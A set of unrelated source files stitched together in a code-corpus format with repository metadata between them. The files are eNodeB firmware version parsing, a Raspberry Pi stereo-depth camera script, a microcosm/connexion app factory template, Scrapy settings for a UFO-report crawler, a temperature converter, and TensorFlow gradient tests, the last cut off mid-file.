        return EnodebDeviceName.BAICELLS_QAFB
    if sw_version.startswith('BaiBS_QAFA'):
        return EnodebDeviceName.BAICELLS_QAFA
    # RTS and RTSH builds share the same data model.
    if sw_version.startswith(('BaiBS_RTS_', 'BaiBS_RTSH_')):
        return EnodebDeviceName.BAICELLS_RTS
    if sw_version.startswith('BaiStation_'):
        # Note: to disable flag inversion completely (for all builds),
        # set to BaiStation_V000R000C00B000SPC000
        # Note: to force flag inversion always (for all builds),
        # set to BaiStation_V999R999C99B999SPC999
        invert_before_version = \
            _parse_sw_version('BaiStation_V100R001C00B110SPC003')
        if _parse_sw_version(sw_version) < invert_before_version:
            return EnodebDeviceName.BAICELLS_OLD
        return EnodebDeviceName.BAICELLS
    raise UnrecognizedEnodebError(
        "Device %s unsupported: Software (%s)"
        % (device_oui, sw_version),
    )
def _parse_sw_version(version_str):
    """
    Parse SW version string.

    Expects format: BaiStation_V100R001C00B110SPC003
    For the above version string, returns: [100, 1, 0, 110, 3]
    Note: trailing characters (for dev builds) are ignored. Null is returned
    for version strings that don't match the above format.
    """
    logger.debug('Got firmware version: %s', version_str)
    matches = re.findall(
        r'BaiStation_V(\d{3})R(\d{3})C(\d{2})B(\d{3})SPC(\d{3})', version_str,
    )
    if not matches:
        return None
    if len(matches) > 1:
        # More than one version-shaped substring: warn but use the first.
        logger.warning(
            'SW version (%s) not formatted as expected',
            version_str,
        )
    parsed = []
    for field in matches[0]:
        try:
            parsed.append(int(field))
        except ValueError:
            logger.warning(
                'SW version (%s) not formatted as expected',
                version_str,
            )
            return None
    logger.debug('Parsed firmware version: %s', parsed)
    return parsed
| 34.310345
| 78
| 0.668593
|
4a07d03fdb2dd4ebb408abd5d47a6f9ffbb7f1ce
| 2,663
|
py
|
Python
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 6
|
2017-06-05T10:39:37.000Z
|
2018-05-07T12:03:04.000Z
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 18
|
2017-07-08T21:04:48.000Z
|
2022-03-11T23:14:34.000Z
|
Raspberry/Stereo/StereoCamera.py
|
TUM-AERIUS/Aerius
|
be0ba4dd119b2ae1ba9fdea3a98d1757ef0d7e82
|
[
"MIT"
] | 1
|
2017-06-16T16:43:20.000Z
|
2017-06-16T16:43:20.000Z
|
from matplotlib import pyplot as plt
import numpy as np
import cv2
import socket
import struct
import io
import json
import os
import sys
# Useful references:
# http://docs.opencv.org/3.0-beta/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html#reprojectimageto3d
# use StereoMatcher::compute to get the disparity matrix
# get the the points in 3d space, needs disparity and other values we got from calibration
cameraDataFolder = "cameraData.json"
path_to_script = os.path.realpath(__file__)
parent_directory = os.path.dirname(path_to_script)
def getStereoImages(connection):
    """Request one stereo image pair from the photo server.

    :param connection: file-like object (e.g. a socket's makefile) with
        write/flush/read. Protocol: send a little-endian uint32 `1`, then
        receive two little-endian uint32 lengths followed by the two JPEG
        payloads (left image first, then right).
    :returns: tuple (imageLeft, imageRight) of grayscale OpenCV images.
    """
    # Request a new photo from the photo server
    connection.write(struct.pack('<L', 1))
    connection.flush()
    # Get lengths
    imageLeftLength = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
    imageRightLength = struct.unpack('<L', connection.read(struct.calcsize('<L')))[0]
    # Get images
    # https://picamera.readthedocs.io/en/release-1.10/recipes1.html
    # streams are in jpeg format
    # we have to reformat for openCV to be able to read them
    imageLeftStream = io.BytesIO()
    imageRightStream = io.BytesIO()
    imageLeftStream.write(connection.read(imageLeftLength))
    imageRightStream.write(connection.read(imageRightLength))
    imageLeftStream.seek(0)
    imageRightStream.seek(0)
    # Construct a numpy array from the stream.
    # FIX: np.fromstring is deprecated for binary input; np.frombuffer gives
    # the identical uint8 array without the DeprecationWarning.
    data = np.frombuffer(imageLeftStream.getvalue(), dtype=np.uint8)
    # "Decode" the image from the array; flag 0 => grayscale
    imageLeft = cv2.imdecode(data, 0)
    data = np.frombuffer(imageRightStream.getvalue(), dtype=np.uint8)
    imageRight = cv2.imdecode(data, 0)
    return imageLeft, imageRight
# start server for PhotoServer.py
photoSocket = socket.socket()
photoSocket.bind(('localhost', 8100))
photoSocket.listen(0)
photoConnection = photoSocket.accept()[0].makefile("rwb")

# Get calibration data from cameraData.json.
# FIX: the original called json.loads() on the file *name* (cameraDataFolder),
# which is not JSON and would always raise; parse the file's contents instead.
camera_data_path = os.path.join(parent_directory, cameraDataFolder)
if os.path.isfile(camera_data_path):
    with open(camera_data_path) as camera_data_file:
        cameraData = json.load(camera_data_file)
else:
    print("No calibration data found")
    sys.exit(0)

# Reprojection matrix produced by the stereo calibration step.
Q = np.array(cameraData["Q"])

# Semi-global block matcher; parameters follow the OpenCV SGBM sample.
window_size = 3
min_disp = 16
num_disp = 112-min_disp
stereo = cv2.StereoSGBM_create(minDisparity = min_disp,
    numDisparities = num_disp,
    blockSize = 16,
    P1 = 8*3*window_size**2,
    P2 = 32*3*window_size**2,
    disp12MaxDiff = 1,
    uniquenessRatio = 10,
    speckleWindowSize = 100,
    speckleRange = 32
)

# Main loop: fetch a stereo pair, compute disparity, reproject to 3D, display.
while True:
    img1, img2 = getStereoImages(photoConnection)
    disparity = stereo.compute(img1, img2)
    image3D = cv2.reprojectImageTo3D(disparity, Q)
    plt.imshow(disparity, 'gray')
    plt.show()
| 30.261364
| 118
| 0.732257
|
4a07d099ee3a16317f81e818608a893acb08fb39
| 1,482
|
py
|
Python
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 2
|
2019-12-10T03:08:09.000Z
|
2019-12-10T03:08:11.000Z
|
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | null | null | null |
{{cookiecutter.repo_name}}/{{cookiecutter.project_name}}/app.py
|
srikiran1/cookiecutter-connexion-microcosm-service
|
da1dea38e08379e8415202b6aed23f79d2d9d24d
|
[
"MIT"
] | 1
|
2019-12-10T03:08:03.000Z
|
2019-12-10T03:08:03.000Z
|
"""
Create the application.
"""
import pkg_resources
from microcosm.api import create_object_graph
from microcosm.loaders import load_each, load_from_environ
from microcosm_connexion.resolver import MicrocosmResolver
from {{ cookiecutter.project_name }}.config import load_default_config
import {{ cookiecutter.project_name }}.controllers.pet # noqa
import {{ cookiecutter.project_name }}.stores.pet # noqa
def create_app(debug=False, testing=False, model_only=False):
    """
    Create the object graph for the application.

    :param debug: enable debug mode on the object graph.
    :param testing: enable testing mode on the object graph.
    :param model_only: when True, wire only the persistence layer
        (logging, postgres, sessionmaker, stores) and skip the web/API
        components.
    :returns: the locked microcosm object graph.
    """
    # Default config first; environment variables override it.
    loader = load_each(
        load_default_config,
        load_from_environ,
    )
    graph = create_object_graph(
        name=__name__.split(".")[0],
        debug=debug,
        testing=testing,
        loader=loader,
    )
    graph.use(
        "logging",
        "postgres",
        "sessionmaker",
        "pet_store",
    )
    if not model_only:
        graph.use(
            "connexion",
            "postgres_session_factory",
            "configure_connexion_error_handler",
            "pet_controller",
        )
        # NOTE(review): the API registration references graph.pet_controller,
        # which is only wired in this branch, so it is nested under the
        # `not model_only` check -- confirm against the template's intent.
        api_path = pkg_resources.resource_filename(__name__, "api/api.yml")
        graph.connexion.add_api(api_path,
                                resolver=MicrocosmResolver(controller=graph.pet_controller, mark_transactional=True),
                                pythonic_params=True,
                                validate_responses=True,
                                )
    return graph.lock()
| 27.444444
| 117
| 0.617409
|
4a07d10bcf59ec46014f0a66f7b548473a6e9a4a
| 3,202
|
py
|
Python
|
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
nuforc_reports/nuforc_reports/settings.py
|
internet-ufo-database/nuforc_sightings_data
|
cc1299b32e198dfa3c4428d3a3824925cd5dd1c2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Scrapy settings for nuforc_reports project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
# Name under which this Scrapy project identifies itself.
BOT_NAME = 'nuforc_reports'

# Where Scrapy discovers spiders, and where new ones are generated.
SPIDER_MODULES = ['nuforc_reports.spiders']
NEWSPIDER_MODULE = 'nuforc_reports.spiders'

# Crawl responsibly by identifying yourself (and your website) on the user-agent
USER_AGENT = 'nuforc_reports (Internet UFO Database)'

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# 100 ms between requests to the same site, to stay polite to the server.
DOWNLOAD_DELAY = 0.10
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'nuforc_reports.middlewares.NuforcReportsSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'nuforc_reports.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'nuforc_reports.pipelines.NuforcReportsPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| 35.186813
| 109
| 0.78326
|
4a07d1c108f493bec4c778931b0e32272b4e5794
| 267
|
py
|
Python
|
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | 1
|
2020-10-06T12:40:00.000Z
|
2020-10-06T12:40:00.000Z
|
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | null | null | null |
temperatureConversion.py
|
flyingsonu122/Python
|
f7649615882b77c8fdbd8dc20e954266ee8d1fc2
|
[
"MIT"
] | null | null | null |
# Convert a Fahrenheit temperature entered by the user to Celsius.
fahrenheit = input('What is the temperature in Fahrenheit? ')
try:
    # FIX: str.isnumeric() rejected negative ("-10") and decimal ("98.6")
    # temperatures; float() accepts both and still rejects non-numbers.
    fahrenheit = float(fahrenheit)
except ValueError:
    print('Input is not a number.')
    exit()
# Truncate toward zero, matching the original int() conversion.
celsius = int((fahrenheit - 32) * 5/9)
print('Temperature in celsius is ' + str(celsius))
| 26.7
| 62
| 0.685393
|
4a07d2949a8ad44454ef4d4f15255a14a8f66734
| 26,559
|
py
|
Python
|
tensorflow/python/ops/math_grad_test.py
|
joshz123/tensorflow
|
7841ca029060ab78e221e757d4b1ee6e3e0ffaa4
|
[
"Apache-2.0"
] | 78
|
2020-08-04T12:36:25.000Z
|
2022-03-25T04:23:40.000Z
|
tensorflow/python/ops/math_grad_test.py
|
sagol/tensorflow
|
04f2870814d2773e09dcfa00cbe76a66a2c4de88
|
[
"Apache-2.0"
] | 203
|
2019-06-14T23:53:10.000Z
|
2022-02-10T02:27:23.000Z
|
tensorflow/python/ops/math_grad_test.py
|
sagol/tensorflow
|
04f2870814d2773e09dcfa00cbe76a66a2c4de88
|
[
"Apache-2.0"
] | 66
|
2020-05-15T10:05:12.000Z
|
2022-02-14T07:28:18.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Python ops defined in math_grad.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.debug.lib import check_numerics_callback
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import gradients
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
class SquaredDifferenceOpTest(test.TestCase):
  """Gradient tests for squared_difference with broadcasting inputs."""

  def _testGrad(self, left_shape, right_shape):
    """Checks numeric gradients of squared_difference w.r.t. both inputs.

    The output shape is whichever input shape has more dimensions; the
    other input is broadcast up to it.
    """
    if len(left_shape) > len(right_shape):
      output_shape = left_shape
    else:
      output_shape = right_shape
    l = np.random.randn(*left_shape)
    r = np.random.randn(*right_shape)

    with self.cached_session(use_gpu=True):
      left_tensor = constant_op.constant(l, shape=left_shape)
      right_tensor = constant_op.constant(r, shape=right_shape)
      output = math_ops.squared_difference(left_tensor, right_tensor)
      left_err = gradient_checker.compute_gradient_error(
          left_tensor, left_shape, output, output_shape, x_init_value=l)
      right_err = gradient_checker.compute_gradient_error(
          right_tensor, right_shape, output, output_shape, x_init_value=r)
      self.assertLess(left_err, 1e-10)
      self.assertLess(right_err, 1e-10)

  @test_util.run_deprecated_v1
  def testGrad(self):
    # Broadcast in both directions: left has more dims, then right does.
    self._testGrad([1, 2, 3, 2], [3, 2])
    self._testGrad([2, 4], [3, 2, 4])
class AbsOpTest(test.TestCase):
  """Gradient tests for abs() over real and complex inputs."""

  def _biasedRandN(self, shape, bias=0.1, sigma=1.0):
    """Returns samples from a normal distribution shifted `bias` away from 0."""
    value = np.random.randn(*shape) * sigma
    return value + np.sign(value) * bias

  def _testGrad(self, shape, dtype=None, max_error=None, bias=None, sigma=None):
    """Checks the numeric gradient of abs(value) for biased random values.

    Values are biased away from zero because abs() has no gradient at 0.
    """
    np.random.seed(7)  # fixed seed keeps the test deterministic
    if dtype in (dtypes.complex64, dtypes.complex128):
      value = math_ops.complex(
          self._biasedRandN(
              shape, bias=bias, sigma=sigma),
          self._biasedRandN(
              shape, bias=bias, sigma=sigma))
    else:
      value = ops.convert_to_tensor(
          self._biasedRandN(
              shape, bias=bias), dtype=dtype)

    with self.cached_session(use_gpu=True):
      output = math_ops.abs(value)
      error = gradient_checker.compute_gradient_error(
          value, shape, output, output.get_shape().as_list())
      self.assertLess(error, max_error)

  @test_util.run_deprecated_v1
  def testComplexAbs(self):
    # Bias random test values away from zero to avoid numeric instabilities.
    self._testGrad(
        [3, 3], dtype=dtypes.float32, max_error=2e-5, bias=0.1, sigma=1.0)
    self._testGrad(
        [3, 3], dtype=dtypes.complex64, max_error=2e-5, bias=0.1, sigma=1.0)

    # Ensure stability near the pole at zero.
    self._testGrad(
        [3, 3], dtype=dtypes.float32, max_error=100.0, bias=0.0, sigma=0.1)
    self._testGrad(
        [3, 3], dtype=dtypes.complex64, max_error=100.0, bias=0.0, sigma=0.1)
class MinOrMaxGradientTest(test.TestCase):
  """Checks gradients of reduce_min/reduce_max over duplicated inputs."""

  @test_util.run_deprecated_v1
  def testMinGradient(self):
    x = constant_op.constant([1.0], dtype=dtypes.float32)
    y = math_ops.reduce_min(array_ops.concat([x, x], 0))
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(x, [1], y, [])
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testMaxGradient(self):
    x = constant_op.constant([1.0], dtype=dtypes.float32)
    y = math_ops.reduce_max(array_ops.concat([x, x], 0))
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(x, [1], y, [])
      self.assertLess(err, 1e-4)
class MaximumOrMinimumGradientTest(test.TestCase):
  """Checks gradients of maximum/minimum against a scalar threshold."""

  @test_util.run_deprecated_v1
  def testMaximumGradient(self):
    x = constant_op.constant([1.0, 2.0, 3.0, 4.0], dtype=dtypes.float32)
    y = math_ops.maximum(x, 3.0)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(x, [4], y, [4])
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testMinimumGradient(self):
    x = constant_op.constant([1.0, 2.0, 3.0, 4.0], dtype=dtypes.float32)
    y = math_ops.minimum(x, 2.0)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(x, [4], y, [4])
      self.assertLess(err, 1e-4)
class ProdGradientTest(test.TestCase):
  """Checks gradients of reduce_prod for real and complex inputs."""

  def _check_prod_gradient(self, values, dtype, axis=None):
    # Builds reduce_prod(values) (optionally along `axis`) and verifies that
    # the numeric-vs-analytic gradient error is small.
    inputs = constant_op.constant(values, dtype=dtype)
    if axis is None:
      outputs = math_ops.reduce_prod(inputs)
    else:
      outputs = math_ops.reduce_prod(inputs, axis)
    with self.cached_session():
      error = gradient_checker.compute_gradient_error(
          inputs, inputs.get_shape().as_list(),
          outputs, outputs.get_shape().as_list())
      self.assertLess(error, 1e-4)

  @test_util.run_deprecated_v1
  def testProdGradient(self):
    self._check_prod_gradient([[1., 2.], [3., 4.]], dtypes.float32)

  @test_util.run_deprecated_v1
  def testProdGradientForNegativeAxis(self):
    self._check_prod_gradient([[1., 2.], [3., 4.]], dtypes.float32, axis=-1)

  @test_util.run_deprecated_v1
  def testProdGradientComplex(self):
    for dtype in dtypes.complex64, dtypes.complex128:
      self._check_prod_gradient([[1 + 3j, 2 - 1j], [3j, 4]], dtype)

  @test_util.run_deprecated_v1
  def testProdGradientForNegativeAxisComplex(self):
    for dtype in dtypes.complex64, dtypes.complex128:
      self._check_prod_gradient([[1 + 3j, 2 - 1j], [3j, 4]], dtype, axis=-1)
@test_util.run_all_in_graph_and_eager_modes
class EuclideanNormGradientTest(test.TestCase):
def testBasic(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testNegative(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([-3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testKeepdims(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testGradientChain(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
lambda x: math_ops.reduce_euclidean_norm(x) * 5, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testTwoElements(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([3, -4], dtype=dtype)
grad = gradient_checker_v2.compute_gradient(
math_ops.reduce_euclidean_norm, [x])
err = gradient_checker_v2.max_error(*grad)
self.assertLess(err, 1e-3)
def testNegativeZero(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([1.0, -0.0], dtype=dtype)
with backprop.GradientTape() as tape:
tape.watch(x)
y = math_ops.reduce_euclidean_norm(x)
dx = tape.gradient(y, x)
dx_answer = constant_op.constant([1.0, -0.0], dtype=dtype)
self.assertAllClose(dx, dx_answer)
self.assertAllClose(1.0 / dx, 1.0 / dx_answer)
def testZeros(self):
for dtype in [dtypes.float32, dtypes.float64]:
x = constant_op.constant([0.0, -0.0], dtype=dtype)
with backprop.GradientTape() as tape:
tape.watch(x)
y = math_ops.reduce_euclidean_norm(x)
dx = tape.gradient(y, x)
dx_answer = constant_op.constant(
[float("NaN"), float("NaN")], dtype=dtype)
self.assertAllClose(dx, dx_answer)
def test2D_1(self):
  # Full reduction over a 2-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        math_ops.reduce_euclidean_norm, [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 1e-3)
def test2D_2(self):
  # Reduction along axis 0 of a 2-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 0), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 1e-3)
def test2D_3(self):
  # Reduction along axis 1 of a 2-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[-3, 5], [7, 11]], dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 1e-3)
def test2D_4(self):
  # Axis-1 reduction where each row has a single element.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[3], [4]], dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 1e-3)
def test3D_1(self):
  # Full reduction over a 3-D input; tolerance is looser for the larger
  # accumulation.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
                             dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        math_ops.reduce_euclidean_norm, [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 2e-3)
def test3D_2(self):
  # Reduction along axis 0 of a 3-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
                             dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 0), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 2e-3)
def test3D_3(self):
  # Reduction along axis 1 of a 3-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
                             dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 1), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 3e-3)
def test3D_4(self):
  # Reduction along the innermost axis of a 3-D input.
  for dtype in (dtypes.float32, dtypes.float64):
    x = constant_op.constant([[[-3, 5], [7, 11]], [[13, 17], [19, 23]]],
                             dtype=dtype)
    theoretical, numerical = gradient_checker_v2.compute_gradient(
        lambda x: math_ops.reduce_euclidean_norm(x, 2), [x])
    self.assertLess(
        gradient_checker_v2.max_error(theoretical, numerical), 2e-3)
class SegmentMinOrMaxGradientTest(test.TestCase):
  """Numeric gradient checks for segment_min and segment_max."""

  @test_util.run_deprecated_v1
  def testSegmentMinGradient(self):
    data = constant_op.constant([1.0, 2.0, 3.0], dtype=dtypes.float32)
    segment_ids = constant_op.constant([0, 0, 1], dtype=dtypes.int64)
    result = math_ops.segment_min(data, segment_ids)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(data, [3], result, [2])
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testSegmentMaxGradient(self):
    data = constant_op.constant([1.0, 2.0, 3.0], dtype=dtypes.float32)
    segment_ids = constant_op.constant([0, 0, 1], dtype=dtypes.int64)
    result = math_ops.segment_max(data, segment_ids)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(data, [3], result, [2])
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testSegmentMinGradientWithTies(self):
    # Duplicating the same tensor makes the min non-unique within a segment.
    inputs = constant_op.constant([1.0], dtype=dtypes.float32)
    data = array_ops.concat([inputs, inputs], 0)
    segment_ids = constant_op.constant([0, 0], dtype=dtypes.int64)
    result = math_ops.segment_min(data, segment_ids)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(inputs, [1], result, [1])
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testSegmentMaxGradientWithTies(self):
    # Duplicating the same tensor makes the max non-unique within a segment.
    inputs = constant_op.constant([1.0], dtype=dtypes.float32)
    data = array_ops.concat([inputs, inputs], 0)
    segment_ids = constant_op.constant([0, 0], dtype=dtypes.int64)
    result = math_ops.segment_max(data, segment_ids)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(inputs, [1], result, [1])
      self.assertLess(err, 1e-4)
class FloorModGradientTest(test.TestCase):
  """Numeric gradient check for floormod."""

  @test_util.run_deprecated_v1
  def testFloorModGradient(self):
    # Making sure the input is not near the discontinuity point where
    # x/y == floor(x/y)
    divisor = constant_op.constant([17.], dtype=dtypes.float32)
    dividend = constant_op.constant([131.], dtype=dtypes.float32)
    result = math_ops.floormod(dividend, divisor)
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(dividend, [1],
                                                    result, [1])
      self.assertLess(err, 1e-4)
class DivNoNanGradientTest(test.TestCase):
  """Gradient tests for div_no_nan."""

  @test_util.run_deprecated_v1
  def testBasicGradient(self):
    inputs = constant_op.constant(np.arange(-3, 3), dtype=dtypes.float32)
    outputs = math_ops.div_no_nan(inputs, 1 + math_ops.abs(inputs))
    with self.cached_session():
      err = gradient_checker.compute_gradient_error(
          inputs, inputs.get_shape().as_list(),
          outputs, outputs.get_shape().as_list())
      self.assertLess(err, 1e-4)

  @test_util.run_deprecated_v1
  def testGradientWithDenominatorIsZero(self):
    # Both partial derivatives are defined to be zero wherever y == 0.
    x = constant_op.constant(np.arange(-3, 3), dtype=dtypes.float32)
    y = array_ops.zeros_like(x, dtype=dtypes.float32)
    outputs = math_ops.div_no_nan(x, y)
    with self.cached_session():
      dx, dy = gradients.gradients(outputs, [x, y])
      self.assertAllClose(dx.eval(), np.zeros(x.shape.as_list()))
      self.assertAllClose(dy.eval(), np.zeros(y.shape.as_list()))
class MulNoNanGradientTest(test.TestCase):
  """Gradient tests for mul_no_nan."""

  @test_util.run_deprecated_v1
  def testBasicGradient(self):
    """Numeric gradient check where neither factor is zero."""
    inputs = constant_op.constant(np.arange(-3, 3), dtype=dtypes.float32)
    outputs = math_ops.mul_no_nan(inputs, 1 + math_ops.abs(inputs))
    with self.cached_session():
      error = gradient_checker.compute_gradient_error(
          inputs,
          inputs.get_shape().as_list(), outputs,
          outputs.get_shape().as_list())
      self.assertLess(error, 1e-4)

  @test_util.run_deprecated_v1
  def testGradientWithRhsIsZero(self):
    """d/dx mul_no_nan(x, 0) is 0 even for non-finite x; d/dy is x."""
    # FIX: np.NINF was removed in NumPy 2.0; -np.inf is the equivalent,
    # version-safe spelling of negative infinity.
    x_vals = [0, 1.0, np.nan, np.inf, -np.inf]
    x = constant_op.constant(x_vals, dtype=dtypes.float32)
    y = array_ops.zeros_like(x, dtype=dtypes.float32)
    outputs = math_ops.mul_no_nan(x, y)
    with self.cached_session():
      dx, dy = gradients.gradients(outputs, [x, y])
      self.assertAllClose(dx.eval(), np.zeros(x.shape.as_list()))
      self.assertAllClose(dy.eval(), x_vals)
class XlogyTest(test.TestCase):
  """Gradient tests for xlogy, including the x == 0 convention."""

